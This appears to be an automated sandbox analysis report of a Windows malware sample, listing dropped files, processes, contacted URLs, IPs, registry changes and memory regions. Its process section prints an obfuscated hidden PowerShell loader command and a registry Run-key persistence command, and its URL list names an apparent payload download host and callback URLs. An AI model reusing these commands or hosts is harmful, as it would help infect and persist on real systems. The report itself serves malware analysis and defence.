Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37
|
ASCII text, with very long lines (65536), with no line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\Overfondle.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Temp\nscAD7.tmp\nsExec.dll
|
PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
modified
|
||
|
C:\Users\user\AppData\Local\Temp\545Ni1I
|
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie
0x36, schema 4, UTF-8, version-valid-for 7
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Aphthong.cal
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Microtine76.txt
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\indhuggene.sex
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Moviedom230\Grnnende\syringitis.sei
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Overfondle.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_acx2dohq.jjt.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nabxb5xc.ktc.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Windows\SysWOW64\psiloses.lnk
|
MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun
Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
|
dropped
|
There are 4 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe
|
"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe"
|
|
|
|
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
|
"powershell.exe" -windowstyle hidden "$Indeterminative=Get-Content 'C:\Users\user\AppData\Local\Temp\Moviedom230\Enforcedly251\Afvrgningernes.Ign37';$Introducerer=$Indeterminative.SubString(18884,3);.$Introducerer($Indeterminative)"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\system32\cmd.exe" /c "set /A 1^^0"
|
|
|
|
C:\Users\user\AppData\Local\Temp\Overfondle.exe
|
"C:\Users\user\AppData\Local\Temp\Overfondle.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ
/d "%elaf% -windowstyle minimized $Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
|
|
|
|
C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
|
"C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe"
|
|
|
|
C:\Windows\SysWOW64\cmd.exe
|
"C:\Windows\SysWOW64\cmd.exe"
|
|
|
|
C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe
|
"C:\Program Files (x86)\hjbOBbqHClkGLKNPvXXxpOVoDBLJZtDcdsObrIHXwdfhzNckcWntHExpAxpjApDMgYSbQQmIoQHmYI\rmGjiHyfWQcajCGtrYkAoHJJOdK.exe"
|
|
|
|
C:\Program Files\Mozilla Firefox\firefox.exe
|
"C:\Program Files\Mozilla Firefox\Firefox.exe"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\SysWOW64\reg.exe
|
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hakkebrttet" /t REG_EXPAND_SZ /d "%elaf% -windowstyle minimized
$Ultramicrotome=(Get-ItemProperty -Path 'HKCU:\noncoherent\').Skvadredes;%elaf% ($Ultramicrotome)"
|
There are 2 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
http://www.jt-berger.store/9pdo/?U06lIV=9/X38tn9qLO2xSFr83Mmx4ws3CHxUFQCRmtcXfkuabXCkgKRDBhcw5zs5NSemU/1fww/nV1egvBpaCqwFnieo+CDMv1CzJiFlGe2VwbVhWcu3PKwdg==&VbTh4=rjJH3N1
|
217.160.0.183
|
||
|
https://duckduckgo.com/chrome_newtab
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://duckduckgo.com/ac/?q=
|
unknown
|
||
|
https://www.google.com/images/branding/product/ico/googleg_lodp.ico
|
unknown
|
||
|
https://kraljevikonaci.rs/ETfFmOW246.bin
|
195.252.110.253
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://kraljevikonaci.rs/ETfFmOW246.bin5?
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://kraljevikonaci.rs/
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
http://www.jt-berger.store/9pdo/
|
217.160.0.183
|
||
|
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
|
unknown
|
||
|
http://www.ftp.ftp://ftp.gopher.
|
unknown
|
||
|
http://www.n-benriya002.com/9pdo/
|
219.94.128.41
|
||
|
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
|
unknown
|
||
|
http://www.n-benriya002.com
|
unknown
|
||
|
https://kraljevikonaci.rs/ETfFmOW246.binY
|
unknown
|
||
|
http://nsis.sf.net/NSIS_ErrorError
|
unknown
|
||
|
https://www.ecosia.org/newtab/
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://ac.ecosia.org/autocomplete?q=
|
unknown
|
||
|
http://www.ejbodyart.com/9pdo/?U06lIV=DnYaRovP48GzkkJ0SsWJ4MnlEFB7/DbwuVP/6iFiedv+ORSC+0oTk/Kl1D7Kx2hOtjeczUyzMCTs4BuiBiMV1f4J24UrdDssz4r6IbwvRD0aCWqy3Q==&VbTh4=rjJH3N1
|
112.175.50.218
|
||
|
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
|
unknown
|
||
|
http://nsis.sf.net/NSIS_Error
|
unknown
|
||
|
https://aka.ms/pscore6lB
|
unknown
|
||
|
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
|
unknown
|
||
|
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
|
unknown
|
||
|
https://kraljevikonaci.rs/ETfFmOW246.bins
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
|
unknown
|
There are 25 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
www.ejbodyart.com
|
unknown
|
|
|
|
www.n-benriya002.com
|
unknown
|
|
|
|
ejbodyart.com
|
112.175.50.218
|
||
|
n-benriya002.com
|
219.94.128.41
|
||
|
www.jt-berger.store
|
217.160.0.183
|
||
|
kraljevikonaci.rs
|
195.252.110.253
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
219.94.128.41
|
n-benriya002.com
|
Japan
|
||
|
195.252.110.253
|
kraljevikonaci.rs
|
Serbia
|
||
|
217.160.0.183
|
www.jt-berger.store
|
Germany
|
||
|
112.175.50.218
|
ejbodyart.com
|
Korea Republic of
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\noncoherent
|
Skvadredes
|
||
|
HKEY_CURRENT_USER\Environment
|
elaf
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Hakkebrttet
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
BD0000
|
trusted library allocation
|
page read and write
|
|
|
|
2D60000
|
system
|
page execute and read and write
|
|
|
|
9E59000
|
direct allocation
|
page execute and read and write
|
|
|
|
21B80000
|
unclassified section
|
page execute and read and write
|
|
|
|
D20000
|
trusted library allocation
|
page read and write
|
|
|
|
A0000
|
unclassified section
|
page execute and read and write
|
|
|
|
3C0000
|
system
|
page execute and read and write
|
|
|
|
3550000
|
unkown
|
page execute and read and write
|
|
|
|
8EA000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
201EA000
|
heap
|
page read and write
|
||
|
D1E000
|
unkown
|
page readonly
|
||
|
7A62000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
799E000
|
heap
|
page read and write
|
||
|
22FDD000
|
unclassified section
|
page execute and read and write
|
||
|
7A74000
|
heap
|
page read and write
|
||
|
89A8000
|
heap
|
page read and write
|
||
|
478000
|
heap
|
page read and write
|
||
|
754000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C14000
|
heap
|
page read and write
|
||
|
400000
|
unkown
|
page readonly
|
||
|
754000
|
heap
|
page read and write
|
||
|
5B8F000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
4487000
|
heap
|
page read and write
|
||
|
7FC60000
|
trusted library allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1709000
|
remote allocation
|
page execute and read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
3349000
|
trusted library allocation
|
page read and write
|
||
|
7A96000
|
heap
|
page read and write
|
||
|
2055D000
|
direct allocation
|
page execute and read and write
|
||
|
1201000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
88CC000
|
stack
|
page read and write
|
||
|
22570000
|
unclassified section
|
page execute and read and write
|
||
|
910000
|
heap
|
page read and write
|
||
|
3380000
|
trusted library allocation
|
page read and write
|
||
|
962000
|
heap
|
page read and write
|
||
|
1FC9F000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
33A8000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1FEE0000
|
remote allocation
|
page read and write
|
||
|
7ABB000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
A0000
|
direct allocation
|
page read and write
|
||
|
8760000
|
trusted library allocation
|
page read and write
|
||
|
16A20E40000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
3401000
|
direct allocation
|
page execute and read and write
|
||
|
1F4B0000
|
direct allocation
|
page read and write
|
||
|
970000
|
heap
|
page read and write
|
||
|
78FB000
|
heap
|
page read and write
|
||
|
51F0000
|
direct allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
401000
|
unkown
|
page execute read
|
||
|
434000
|
unkown
|
page read and write
|
||
|
D11000
|
unkown
|
page execute read
|
||
|
D10000
|
unkown
|
page readonly
|
||
|
2DF1000
|
system
|
page execute and read and write
|
||
|
1DC000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
47B000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
A859000
|
direct allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1F4AC000
|
system
|
page read and write
|
||
|
7909000
|
heap
|
page read and write
|
||
|
7B50000
|
trusted library allocation
|
page read and write
|
||
|
1F4D0000
|
direct allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
86A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
89C0000
|
heap
|
page read and write
|
||
|
200C0000
|
heap
|
page read and write
|
||
|
44C8000
|
heap
|
page read and write
|
||
|
7A6A000
|
heap
|
page read and write
|
||
|
60000
|
unkown
|
page readonly
|
||
|
11A0000
|
heap
|
page read and write
|
||
|
1F4A0000
|
direct allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
5090000
|
heap
|
page read and write
|
||
|
84EF000
|
stack
|
page read and write
|
||
|
D10000
|
unkown
|
page readonly
|
||
|
97C000
|
heap
|
page read and write
|
||
|
440000
|
heap
|
page read and write
|
||
|
D10000
|
unkown
|
page readonly
|
||
|
865F000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
A7F000
|
unkown
|
page read and write
|
||
|
7290000
|
direct allocation
|
page read and write
|
||
|
8DF000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7D0000
|
unkown
|
page readonly
|
||
|
3183000
|
heap
|
page read and write
|
||
|
420000
|
unkown
|
page readonly
|
||
|
7D0000
|
unkown
|
page readonly
|
||
|
D11000
|
unkown
|
page execute read
|
||
|
4FE000
|
heap
|
page read and write
|
||
|
2F0B000
|
stack
|
page read and write
|
||
|
1F452000
|
system
|
page read and write
|
||
|
7ACD000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
D40000
|
unkown
|
page readonly
|
||
|
3408000
|
heap
|
page read and write
|
||
|
16A1F551000
|
heap
|
page read and write
|
||
|
649000
|
unkown
|
page execute read
|
||
|
7960000
|
trusted library allocation
|
page execute and read and write
|
||
|
1F490000
|
direct allocation
|
page read and write
|
||
|
7AC5000
|
heap
|
page read and write
|
||
|
D27000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
2DD0000
|
heap
|
page read and write
|
||
|
85E0000
|
trusted library allocation
|
page read and write
|
||
|
2E70000
|
trusted library allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
1F480000
|
direct allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
11EE000
|
unkown
|
page read and write
|
||
|
16A1F54D000
|
heap
|
page read and write
|
||
|
2F88000
|
heap
|
page read and write
|
||
|
2EEE000
|
stack
|
page read and write
|
||
|
7883000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
2830000
|
heap
|
page read and write
|
||
|
8D0000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
85B7000
|
stack
|
page read and write
|
||
|
86E000
|
unkown
|
page read and write
|
||
|
1FD70000
|
direct allocation
|
page read and write
|
||
|
D25000
|
unkown
|
page read and write
|
||
|
6EAC4000
|
unkown
|
page readonly
|
||
|
7992000
|
heap
|
page read and write
|
||
|
8C20000
|
trusted library allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
8A4B000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
16A1F529000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
8C30000
|
trusted library allocation
|
page read and write
|
||
|
44BE000
|
heap
|
page read and write
|
||
|
7AD0000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
8C60000
|
direct allocation
|
page execute and read and write
|
||
|
D11000
|
unkown
|
page execute read
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
826F000
|
stack
|
page read and write
|
||
|
1190000
|
unkown
|
page readonly
|
||
|
7840000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1F440000
|
direct allocation
|
page read and write
|
||
|
20128000
|
heap
|
page read and write
|
||
|
855E000
|
stack
|
page read and write
|
||
|
43E000
|
unkown
|
page readonly
|
||
|
1F4F0000
|
direct allocation
|
page read and write
|
||
|
2D48000
|
stack
|
page read and write
|
||
|
30B5000
|
heap
|
page read and write
|
||
|
6281000
|
trusted library allocation
|
page read and write
|
||
|
9BF000
|
heap
|
page read and write
|
||
|
16A21016000
|
trusted library allocation
|
page read and write
|
||
|
750000
|
heap
|
page read and write
|
||
|
325D000
|
direct allocation
|
page execute and read and write
|
||
|
40A000
|
unkown
|
page write copy
|
||
|
4C1000
|
heap
|
page read and write
|
||
|
89EF000
|
heap
|
page read and write
|
||
|
5B0000
|
unkown
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
3108000
|
heap
|
page read and write
|
||
|
650000
|
heap
|
page read and write
|
||
|
3334000
|
trusted library allocation
|
page read and write
|
||
|
7982000
|
heap
|
page read and write
|
||
|
7872000
|
heap
|
page read and write
|
||
|
D3E000
|
stack
|
page read and write
|
||
|
15C0000
|
unkown
|
page readonly
|
||
|
4482000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
960000
|
heap
|
page read and write
|
||
|
85D0000
|
trusted library allocation
|
page read and write
|
||
|
A0000
|
direct allocation
|
page read and write
|
||
|
8A11000
|
heap
|
page read and write
|
||
|
69E000
|
stack
|
page read and write
|
||
|
312E000
|
stack
|
page read and write
|
||
|
44C8000
|
heap
|
page read and write
|
||
|
7A56000
|
heap
|
page read and write
|
||
|
7AC5000
|
heap
|
page read and write
|
||
|
1F450000
|
direct allocation
|
page read and write
|
||
|
42A000
|
unkown
|
page read and write
|
||
|
D40000
|
unkown
|
page readonly
|
||
|
3042000
|
unkown
|
page read and write
|
||
|
30E0000
|
heap
|
page read and write
|
||
|
42D5000
|
heap
|
page read and write
|
||
|
3704000
|
unkown
|
page read and write
|
||
|
2F44000
|
heap
|
page read and write
|
||
|
2E00000
|
system
|
page execute and read and write
|
||
|
50DE000
|
stack
|
page read and write
|
||
|
2E54000
|
system
|
page execute and read and write
|
||
|
1FD50000
|
direct allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
89FC000
|
heap
|
page read and write
|
||
|
315C000
|
unkown
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
331F000
|
unkown
|
page read and write
|
||
|
1250000
|
heap
|
page read and write
|
||
|
89E9000
|
heap
|
page read and write
|
||
|
1FAAD000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
42C0000
|
heap
|
page read and write
|
||
|
7A85000
|
heap
|
page read and write
|
||
|
98000
|
stack
|
page read and write
|
||
|
2EAC000
|
stack
|
page read and write
|
||
|
1F970000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1F392000
|
system
|
page read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
C10000
|
heap
|
page read and write
|
||
|
30CE000
|
stack
|
page read and write
|
||
|
94B000
|
heap
|
page read and write
|
||
|
86C0000
|
trusted library allocation
|
page read and write
|
||
|
3310000
|
trusted library section
|
page read and write
|
||
|
D11000
|
unkown
|
page execute read
|
||
|
8DF000
|
heap
|
page read and write
|
||
|
79F000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7B70000
|
trusted library allocation
|
page read and write
|
||
|
1FEE0000
|
remote allocation
|
page read and write
|
||
|
43E000
|
unkown
|
page readonly
|
||
|
62B5FFE000
|
stack
|
page read and write
|
||
|
83AF000
|
stack
|
page read and write
|
||
|
3360000
|
heap
|
page read and write
|
||
|
20144000
|
heap
|
page read and write
|
||
|
4F2E000
|
stack
|
page read and write
|
||
|
447B000
|
heap
|
page read and write
|
||
|
DC0000
|
unkown
|
page readonly
|
||
|
42D0000
|
heap
|
page read and write
|
||
|
8690000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
3472000
|
direct allocation
|
page execute and read and write
|
||
|
33D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7B60000
|
trusted library allocation
|
page read and write
|
||
|
D50000
|
heap
|
page read and write
|
||
|
D1E000
|
unkown
|
page readonly
|
||
|
86D0000
|
trusted library allocation
|
page read and write
|
||
|
33C0000
|
heap
|
page read and write
|
||
|
62B4FFC000
|
stack
|
page read and write
|
||
|
206FD000
|
direct allocation
|
page execute and read and write
|
||
|
3B44000
|
unclassified section
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1FD40000
|
direct allocation
|
page read and write
|
||
|
642A000
|
trusted library allocation
|
page read and write
|
||
|
BD0000
|
trusted library allocation
|
page read and write
|
||
|
1FE8E000
|
stack
|
page read and write
|
||
|
40A000
|
unkown
|
page read and write
|
||
|
2DFD000
|
system
|
page execute and read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
3480000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
11F0000
|
unkown
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7A50000
|
heap
|
page read and write
|
||
|
2F2E000
|
stack
|
page read and write
|
||
|
D1E000
|
unkown
|
page readonly
|
||
|
2DD0000
|
trusted library allocation
|
page read and write
|
||
|
511E000
|
stack
|
page read and write
|
||
|
4F6E000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
DB0000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
49AD000
|
unkown
|
page execute and read and write
|
||
|
5F0000
|
unkown
|
page execute read
|
||
|
D27000
|
unkown
|
page readonly
|
||
|
4487000
|
heap
|
page read and write
|
||
|
1170000
|
unkown
|
page readonly
|
||
|
53D6000
|
trusted library allocation
|
page read and write
|
||
|
791E000
|
heap
|
page read and write
|
||
|
754000
|
heap
|
page read and write
|
||
|
1180000
|
unkown
|
page readonly
|
||
|
408000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1F470000
|
direct allocation
|
page read and write
|
||
|
16A1F479000
|
system
|
page execute and read and write
|
||
|
1FD1D000
|
stack
|
page read and write
|
||
|
1DC000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
203A9000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1210000
|
unkown
|
page read and write
|
||
|
519E000
|
stack
|
page read and write
|
||
|
31A8000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
20772000
|
direct allocation
|
page execute and read and write
|
||
|
5DD000
|
stack
|
page read and write
|
||
|
5F2000
|
unkown
|
page execute read
|
||
|
958000
|
heap
|
page read and write
|
||
|
515E000
|
stack
|
page read and write
|
||
|
8F3000
|
heap
|
page read and write
|
||
|
1F92E000
|
stack
|
page read and write
|
||
|
7DE000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
16A21000000
|
trusted library allocation
|
page read and write
|
||
|
2B09000
|
remote allocation
|
page execute and read and write
|
||
|
2F50000
|
unkown
|
page readonly
|
||
|
C20000
|
unkown
|
page readonly
|
||
|
9A5000
|
heap
|
page read and write
|
||
|
3102000
|
unkown
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
82AE000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
812C000
|
stack
|
page read and write
|
||
|
3050000
|
heap
|
page read and write
|
||
|
D1E000
|
unkown
|
page readonly
|
||
|
79C5000
|
trusted library allocation
|
page read and write
|
||
|
7465000
|
heap
|
page execute and read and write
|
||
|
4560000
|
direct allocation
|
page read and write
|
||
|
958000
|
heap
|
page read and write
|
||
|
16A1F510000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
16A1F400000
|
system
|
page execute and read and write
|
||
|
16A21100000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
5EA000
|
unkown
|
page execute read
|
||
|
6417000
|
trusted library allocation
|
page read and write
|
||
|
3400000
|
heap
|
page read and write
|
||
|
584C000
|
stack
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7A4E000
|
stack
|
page read and write
|
||
|
7460000
|
heap
|
page execute and read and write
|
||
|
5E0000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
1250000
|
heap
|
page read and write
|
||
|
8B0000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
5C0000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
8E4000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
5250000
|
direct allocation
|
page read and write
|
||
|
7893000
|
heap
|
page read and write
|
||
|
5C6E000
|
trusted library allocation
|
page read and write
|
||
|
7AAE000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
16A20E10000
|
heap
|
page read and write
|
||
|
8E2000
|
heap
|
page read and write
|
||
|
7A90000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
13C8000
|
heap
|
page read and write
|
||
|
1F510000
|
direct allocation
|
page read and write
|
||
|
2D40000
|
heap
|
page read and write
|
||
|
968000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
5230000
|
direct allocation
|
page read and write
|
||
|
33E0000
|
trusted library allocation
|
page read and write
|
||
|
83EE000
|
stack
|
page read and write
|
||
|
4FAC000
|
stack
|
page read and write
|
||
|
113D000
|
stack
|
page read and write
|
||
|
62A9000
|
trusted library allocation
|
page read and write
|
||
|
502000
|
heap
|
page read and write
|
||
|
7ACE000
|
heap
|
page read and write
|
||
|
DC0000
|
unkown
|
page readonly
|
||
|
86B0000
|
trusted library allocation
|
page read and write
|
||
|
D25000
|
unkown
|
page read and write
|
||
|
5240000
|
direct allocation
|
page read and write
|
||
|
5F0000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
16A211C4000
|
trusted library allocation
|
page read and write
|
||
|
72B0000
|
direct allocation
|
page read and write
|
||
|
B4D000
|
stack
|
page read and write
|
||
|
8740000
|
trusted library allocation
|
page read and write
|
||
|
7B0D000
|
stack
|
page read and write
|
||
|
7742000
|
heap
|
page read and write
|
||
|
5EC000
|
unkown
|
page execute read
|
||
|
5A1000
|
unkown
|
page readonly
|
||
|
B58000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
4467000
|
heap
|
page read and write
|
||
|
6EAC3000
|
unkown
|
page read and write
|
||
|
3360000
|
trusted library allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7A60000
|
heap
|
page read and write
|
||
|
62EC000
|
trusted library allocation
|
page read and write
|
||
|
3542000
|
unclassified section
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
8A23000
|
heap
|
page read and write
|
||
|
1FCDC000
|
stack
|
page read and write
|
||
|
5A1000
|
unkown
|
page readonly
|
||
|
C21000
|
heap
|
page read and write
|
||
|
5281000
|
trusted library allocation
|
page read and write
|
||
|
3350000
|
trusted library allocation
|
page read and write
|
||
|
13C0000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
5260000
|
direct allocation
|
page read and write
|
||
|
43C000
|
unkown
|
page read and write
|
||
|
60000
|
direct allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
72D0000
|
direct allocation
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
C21000
|
heap
|
page read and write
|
||
|
7ACA000
|
heap
|
page read and write
|
||
|
7940000
|
heap
|
page execute and read and write
|
||
|
626000
|
unkown
|
page execute read
|
||
|
978000
|
heap
|
page read and write
|
||
|
D40000
|
